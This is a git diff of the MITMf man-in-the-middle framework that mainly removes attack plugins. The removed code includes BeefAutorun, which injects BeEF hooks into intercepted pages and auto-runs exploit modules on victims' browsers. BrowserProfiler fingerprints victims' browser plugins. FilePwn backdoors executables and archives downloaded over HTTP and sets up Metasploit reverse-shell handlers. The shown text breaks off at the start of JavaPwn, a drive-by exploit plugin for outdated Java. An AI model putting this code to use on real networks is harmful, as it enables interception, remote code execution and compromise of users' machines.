name = i - - if section.get('tamper_url',False) == url: - return (name, section, 'tamper',url) - - if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): - return (name, section, 'tamper',url) - - if section.get('manifest_url',False) == url: - return (name, section, 'manifest',url) - - if section.get('raw_url',False) == url: - return (name, section, 'raw',url) - - return (None, False,'',urls.copy().pop()) - - diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py deleted file mode 100644 index 39bed82..0000000 --- a/plugins/BeefAutorun.py +++ /dev/null @@ -1,131 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import logging -import sys -import json -import threading - -from core.beefapi.beefapi import BeefAPI -from core.configwatcher import ConfigWatcher -from core.utils import SystemConfig -from plugins.plugin import Plugin -from plugins.Inject import Inject -from time import sleep - -mitmf_logger = logging.getLogger('mitmf') - -class BeefAutorun(Inject, Plugin, ConfigWatcher): - name = "BeEFAutorun" - optname = "beefauto" - desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" - tree_output = [] - depends = ["Inject"] - version = "0.3" - has_opts = False - - def initialize(self, options): - self.options = options - self.ip_address = SystemConfig.getIP(options.interface) - - Inject.initialize(self, options) - - self.onConfigChange() - - t = threading.Thread(name="autorun", target=self.autorun, args=()) - t.setDaemon(True) - t.start() - - def onConfigChange(self): - - beefconfig = self.config['MITMf']['BeEF'] - - self.html_payload = ''.format(self.ip_address, beefconfig['beefport']) - - self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']}) - if not self.beef.login(beefconfig['user'], beefconfig['pass']): - sys.exit("[-] Error logging in to BeEF!") - - self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode'])) - - def autorun(self): - already_ran = [] - already_hooked = [] - - while True: - mode = self.config['BeEFAutorun']['mode'] - sessions = self.beef.sessions_online() - if (sessions is not None and len(sessions) > 0): - for session in sessions: - - if session not in already_hooked: - info = self.beef.hook_info(session) - mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os'])) - already_hooked.append(session) - self.black_ips.append(str(info['ip'])) - - if mode == 'oneshot': - if session not in already_ran: - self.execModules(session) - already_ran.append(session) - - elif mode == 'loop': - self.execModules(session) - sleep(10) - - else: - sleep(1) - - def execModules(self, session): - session_info = self.beef.hook_info(session) - session_ip = session_info['ip'] - hook_browser = session_info['name'] - hook_os = session_info['os'] - all_modules = self.config['BeEFAutorun']["ALL"] - targeted_modules = self.config['BeEFAutorun']["targets"] - - if len(all_modules) > 0: - mitmf_logger.info("{} >> sending generic modules".format(session_ip)) - for module, options in all_modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) - - mitmf_logger.info("{} >> sending targeted modules".format(session_ip)) - for os in targeted_modules: - if (os in hook_os) or (os == hook_os): - browsers = targeted_modules[os] - if len(browsers) > 0: - for browser in browsers: - if browser == hook_browser: - modules = targeted_modules[os][browser] - if len(modules) > 0: - for module, options in modules.iteritems(): - mod_id = self.beef.module_id(module) - resp = self.beef.module_run(session, mod_id, json.loads(options)) - if resp["success"] == 'true': - mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id)) - else: - mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id)) - sleep(0.5) diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py deleted file mode 100644 index 44ea3c5..0000000 --- a/plugins/BrowserProfiler.py +++ /dev/null @@ -1,129 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -from pprint import pformat -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class BrowserProfiler(Inject, Plugin): - name = "Browser Profiler" - optname = "browserprofiler" - desc = "Attempts to enumerate all browser plugins of connected clients" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.get_payload() - self.dic_output = {} # so other plugins can access the results - - def post2dict(self, post): #converts the ajax post to a dic - dict = {} - for line in post.split('&'): - t = line.split('=') - dict[t[0]] = t[1] - return dict - - def sendPostData(self, request): - #Handle the plugin output - if 'clientprfl' in request.uri: - self.dic_output = self.post2dict(request.postData) - self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client - if self.dic_output['plugin_list'] > 0: - self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') - pretty_output = pformat(self.dic_output) - mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) - - def get_payload(self): - payload = """""" - - return payload diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py index b912244..c039f61 100644 --- a/plugins/CacheKill.py +++ b/plugins/CacheKill.py @@ -20,7 +20,6 @@ from plugins.plugin import Plugin - class CacheKill(Plugin): name = "CacheKill" optname = "cachekill" diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py deleted file mode 100644 index ebe6fbc..0000000 --- a/plugins/FilePwn.py +++ /dev/null @@ -1,652 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' -# -# Author Joshua Pitts the.midnite.runr 'at' gmail com -# -# Copyright (c) 2013-2014, Joshua Pitts -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without modification, -# are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# 3. Neither the name of the copyright holder nor the names of its contributors -# may be used to endorse or promote products derived from this software without -# specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. -# -# Tested on Kali-Linux. - -import sys -import os -import pefile -import zipfile -import logging -import shutil -import random -import string -import tarfile -import multiprocessing -import threading - -from libs.bdfactory import pebin -from libs.bdfactory import elfbin -from libs.bdfactory import machobin -from core.msfrpc import Msfrpc -from core.configwatcher import ConfigWatcher -from plugins.plugin import Plugin -from tempfile import mkstemp -from configobj import ConfigObj - -mitmf_logger = logging.getLogger('mitmf') - -class FilePwn(Plugin, ConfigWatcher): - name = "FilePwn" - optname = "filepwn" - desc = "Backdoor executables being sent over http using bdfactory" - implements = ["handleResponse"] - tree_output = ["BDFProxy v0.3.2 online"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - - self.patched = multiprocessing.Queue() - - #FOR FUTURE USE - self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] - - #FOR FUTURE USE - self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] - - #USED NOW - self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, - 'pe': {'number': 'MZ', 'offset': 0}, - 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, - 'bz': {'number': 'BZ', 'offset': 0}, - 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, - 'tar': {'number': 'ustar', 'offset': 257}, - 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, - 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, - 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, - } - - #NOT USED NOW - #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) - - #FilePwn options - self.userConfig = self.config['FilePwn'] - self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] - self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] - self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] - self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] - self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] - self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] - self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] - self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] - self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] - self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] - self.zipblacklist = self.userConfig['ZIP']['blacklist'] - self.tarblacklist = self.userConfig['TAR']['blacklist'] - - #Metasploit options - msfcfg = self.config['MITMf']['Metasploit'] - rpcip = msfcfg['rpcip'] - rpcpass = msfcfg['rpcpass'] - - try: - msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary - msf.login('msf', rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - self.tree_output.append("Setting up Metasploit payload handlers") - jobs = msf.call('job.list') - for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: - cmd = "use exploit/multi/handler\n" - cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) - cmd += "set LHOST {}\n".format(config["HOST"]) - cmd += "set LPORT {}\n".format(config["PORT"]) - cmd += "exploit -j\n" - - if jobs: - for pid, name in jobs.iteritems(): - info = msf.call('job.info', [pid]) - if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - else: - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) - - def onConfigChange(self): - self.initialize(self.options) - - def convert_to_Bool(self, aString): - if aString.lower() == 'true': - return True - elif aString.lower() == 'false': - return False - elif aString.lower() == 'none': - return None - - def bytes_have_format(self, bytess, formatt): - number = self.magicNumbers[formatt] - if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: - return True - return False - - def binaryGrinder(self, binaryFile): - """ - Feed potential binaries into this function, - it will return the result PatchedBinary, False, or None - """ - - with open(binaryFile, 'r+b') as f: - binaryTMPHandle = f.read() - - binaryHeader = binaryTMPHandle[:4] - result = None - - try: - if binaryHeader[:2] == 'MZ': # PE/COFF - pe = pefile.PE(data=binaryTMPHandle, fast_load=True) - magic = pe.OPTIONAL_HEADER.Magic - machineType = pe.FILE_HEADER.Machine - - #update when supporting more than one arch - if (magic == int('20B', 16) and machineType == 0x8664 and - self.WindowsType.lower() in ['all', 'x64']): - add_section = False - cave_jumping = False - if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx64['SHELL'], - HOST=self.WindowsIntelx64['HOST'], - PORT=int(self.WindowsIntelx64['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif (machineType == 0x14c and - self.WindowsType.lower() in ['all', 'x86']): - add_section = False - cave_jumping = False - #add_section wins for cave_jumping - #default is single for BDF - if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': - add_section = True - elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': - cave_jumping = True - - # if automatic override - if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': - cave_jumping = True - - targetFile = pebin.pebin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.WindowsIntelx86['SHELL'], - HOST=self.WindowsIntelx86['HOST'], - PORT=int(self.WindowsIntelx86['PORT']), - ADD_SECTION=add_section, - CAVE_JUMPING=cave_jumping, - IMAGE_TYPE=self.WindowsType, - PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), - SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], - ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() - ) - - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF - - targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - if targetFile.class_type == 0x1: - #x86CPU Type - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx86['SHELL'], - HOST=self.LinuxIntelx86['HOST'], - PORT=int(self.LinuxIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - elif targetFile.class_type == 0x2: - #x64 - targetFile = elfbin.elfbin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.LinuxIntelx64['SHELL'], - HOST=self.LinuxIntelx64['HOST'], - PORT=int(self.LinuxIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], - IMAGE_TYPE=self.LinuxType - ) - result = targetFile.run_this() - - elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho - targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) - targetFile.support_check() - - #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE - - if targetFile.FAT_FILE is True: - if self.FatPriority == 'x86': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif self.FatPriority == 'x64': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx86['SHELL'], - HOST=self.MachoIntelx86['HOST'], - PORT=int(self.MachoIntelx86['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': - targetFile = machobin.machobin(FILE=binaryFile, - OUTPUT=os.path.basename(binaryFile), - SHELL=self.MachoIntelx64['SHELL'], - HOST=self.MachoIntelx64['HOST'], - PORT=int(self.MachoIntelx64['PORT']), - SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], - FAT_PRIORITY=self.FatPriority - ) - result = targetFile.run_this() - - self.patched.put(result) - return - - except Exception as e: - print 'Exception', str(e) - mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) - return None - - def tar_files(self, aTarFileBytes, formatt): - "When called will unpack and edit a Tar File and return a tar file" - - print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' - - if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): - print "[!] TarFile over allowed size" - mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes))) - self.patched.put(aTarFileBytes) - return - - with tempfile.NamedTemporaryFile() as tarFileStorage: - tarFileStorage.write(aTarFileBytes) - tarFileStorage.flush() - - if not tarfile.is_tarfile(tarFileStorage.name): - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - compressionMode = ':' - if formatt == 'gz': - compressionMode = ':gz' - if formatt == 'bz': - compressionMode = ':bz2' - - tarFile = None - try: - tarFileStorage.seek(0) - tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode) - except tarfile.ReadError: - pass - - if tarFile is None: - print '[!] Not a tar file' - self.patched.put(aTarFileBytes) - return - - print '[*] Tar file contents and info:' - print '[*] Compression:', formatt - - members = tarFile.getmembers() - for info in members: - print "\t", info.name, info.mtime, info.size - - newTarFileStorage = tempfile.NamedTemporaryFile() - newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage) - - patchCount = 0 - wasPatched = False - - for info in members: - print "[*] >>> Next file in tarfile:", info.name - - if not info.isfile(): - print info.name, 'is not a file' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - if info.size >= long(self.FileSizeMax): - print info.name, 'is too big' - newTarFile.addfile(info, tarFile.extractfile(info)) - continue - - # Check against keywords - keywordCheck = False - - if type(self.tarblacklist) is str: - if self.tarblacklist.lower() in info.name.lower(): - keywordCheck = True - - else: - for keyword in self.tarblacklist: - if keyword.lower() in info.name.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Tar blacklist enforced!" - mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name)) - continue - - # Try to patch - extractedFile = tarFile.extractfile(info) - - if patchCount >= int(self.userConfig['TAR']['patchCount']): - newTarFile.addfile(info, extractedFile) - else: - # create the file on disk temporarily for fileGrinder to run on it - with tempfile.NamedTemporaryFile() as tmp: - shutil.copyfileobj(extractedFile, tmp) - tmp.flush() - patchResult = self.binaryGrinder(tmp.name) - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(tmp.name) - print "[*] Patching complete, adding to tar file." - info.size = os.stat(file2).st_size - with open(file2, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name)) - os.remove(file2) - wasPatched = True - else: - print "[!] Patching failed" - with open(tmp.name, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name)) - if patchCount == int(self.userConfig['TAR']['patchCount']): - mitmf_logger.info("Met Tar config patchCount limit.") - - # finalize the writing of the tar file first - newTarFile.close() - - # then read the new tar file into memory - newTarFileStorage.seek(0) - ret = newTarFileStorage.read() - newTarFileStorage.close() # it's automatically deleted - - if wasPatched is False: - # If nothing was changed return the original - print "[*] No files were patched forwarding original file" - self.patched.put(aTarFileBytes) - return - else: - self.patched.put(ret) - return - - def zip_files(self, aZipFile): - "When called will unpack and edit a Zip File and return a zip file" - - print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' - - if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): - print "[!] ZipFile over allowed size" - mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile))) - self.patched.put(aZipFile) - return - - tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) - tmpDir = '/tmp/' + tmpRan - tmpFile = '/tmp/' + tmpRan + '.zip' - - os.mkdir(tmpDir) - - with open(tmpFile, 'w') as f: - f.write(aZipFile) - - zippyfile = zipfile.ZipFile(tmpFile, 'r') - - #encryption test - try: - zippyfile.testzip() - - except RuntimeError as e: - if 'encrypted' in str(e): - mitmf_logger.info('Encrypted zipfile found. Not patching.') - return aZipFile - - print "[*] ZipFile contents and info:" - - for info in zippyfile.infolist(): - print "\t", info.filename, info.date_time, info.file_size - - zippyfile.extractall(tmpDir) - - patchCount = 0 - - wasPatched = False - - for info in zippyfile.infolist(): - print "[*] >>> Next file in zipfile:", info.filename - - if os.path.isdir(tmpDir + '/' + info.filename) is True: - print info.filename, 'is a directory' - continue - - #Check against keywords - keywordCheck = False - - if type(self.zipblacklist) is str: - if self.zipblacklist.lower() in info.filename.lower(): - keywordCheck = True - - else: - for keyword in self.zipblacklist: - if keyword.lower() in info.filename.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Zip blacklist enforced!" - mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename)) - continue - - patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) - - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(info.filename) - print "[*] Patching complete, adding to zip file." - shutil.copyfile(file2, tmpDir + '/' + info.filename) - mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename)) - os.remove(file2) - wasPatched = True - else: - print "[!] Patching failed" - mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename)) - - print '-' * 10 - - if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting. - mitmf_logger.info("Met Zip config patchCount limit.") - break - - zippyfile.close() - - zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) - - print "[*] Writing to zipfile:", tmpFile - - for base, dirs, files in os.walk(tmpDir): - for afile in files: - filename = os.path.join(base, afile) - print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') - zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) - - zipResult.close() - #clean up - shutil.rmtree(tmpDir) - - with open(tmpFile, 'rb') as f: - tempZipFile = f.read() - os.remove(tmpFile) - - if wasPatched is False: - print "[*] No files were patched forwarding original file" - self.patched.put(aZipFile) - return - else: - self.patched.put(tempZipFile) - return - - def handleResponse(self, request, data): - - content_header = request.client.headers['Content-Type'] - client_ip = request.client.getClientIP() - - if content_header in self.zipMimeTypes: - - if self.bytes_have_format(data, 'zip'): - mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) - - process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_zip = self.patched.get() - - if bd_zip: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_zip} - - else: - for tartype in ['gz','bz','tar']: - if self.bytes_have_format(data, tartype): - mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) - - process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_tar = self.patched.get() - - if bd_tar: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_tar} - - - elif content_header in self.binaryMimeTypes: - for bintype in ['pe','elf','fatfile','machox64','machox86']: - if self.bytes_have_format(data, bintype): - mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) - fd, tmpFile = mkstemp() - with open(tmpFile, 'w') as f: - f.write(data) - - process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) - process.daemon = True - process.start() - process.join() - patchb = self.patched.get() - - if patchb: - bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() - os.remove('./backdoored/' + os.path.basename(tmpFile)) - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_binary} - - else: - mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header)) - return {'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index 68cd277..a28375b 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -24,15 +24,10 @@ import re import sys import argparse -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr - from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill -mitmf_logger = logging.getLogger('mitmf') - class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py deleted file mode 100644 index 15a292d..0000000 --- a/plugins/JavaPwn.py +++ /dev/null @@ -1,235 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import string -import random -import threading -import sys -import logging - -from core.msfrpc import Msfrpc -from plugins.plugin import Plugin -from plugins.BrowserProfiler import BrowserProfiler -from time import sleep - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr - -requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message -requests_log.setLevel(logging.WARNING) - -mitmf_logger = logging.getLogger('mitmf') - -class JavaPwn(BrowserProfiler, Plugin): - name = "JavaPwn" - optname = "javapwn" - desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" - tree_output = [] - depends = ["Browserprofiler"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.msfip = options.ip_address - self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit - - try: - msfcfg = options.configfile['MITMf']['Metasploit'] - except Exception, e: - sys.exit("[-] Error parsing Metasploit options in config file : " + str(e)) - - try: - self.javacfg = options.configfile['JavaPwn'] - except Exception, e: - sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) - - self.msfport = msfcfg['msfport'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - - #Initialize the BrowserProfiler plugin - BrowserProfiler.initialize(self, options) - self.black_ips = [] - - try: - msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - msf.login('msf', self.rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v%s" % version) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - t = threading.Thread(name='pwn', target=self.pwn, args=(msf,)) - t.setDaemon(True) - t.start() #start the main thread - - def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) - return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) 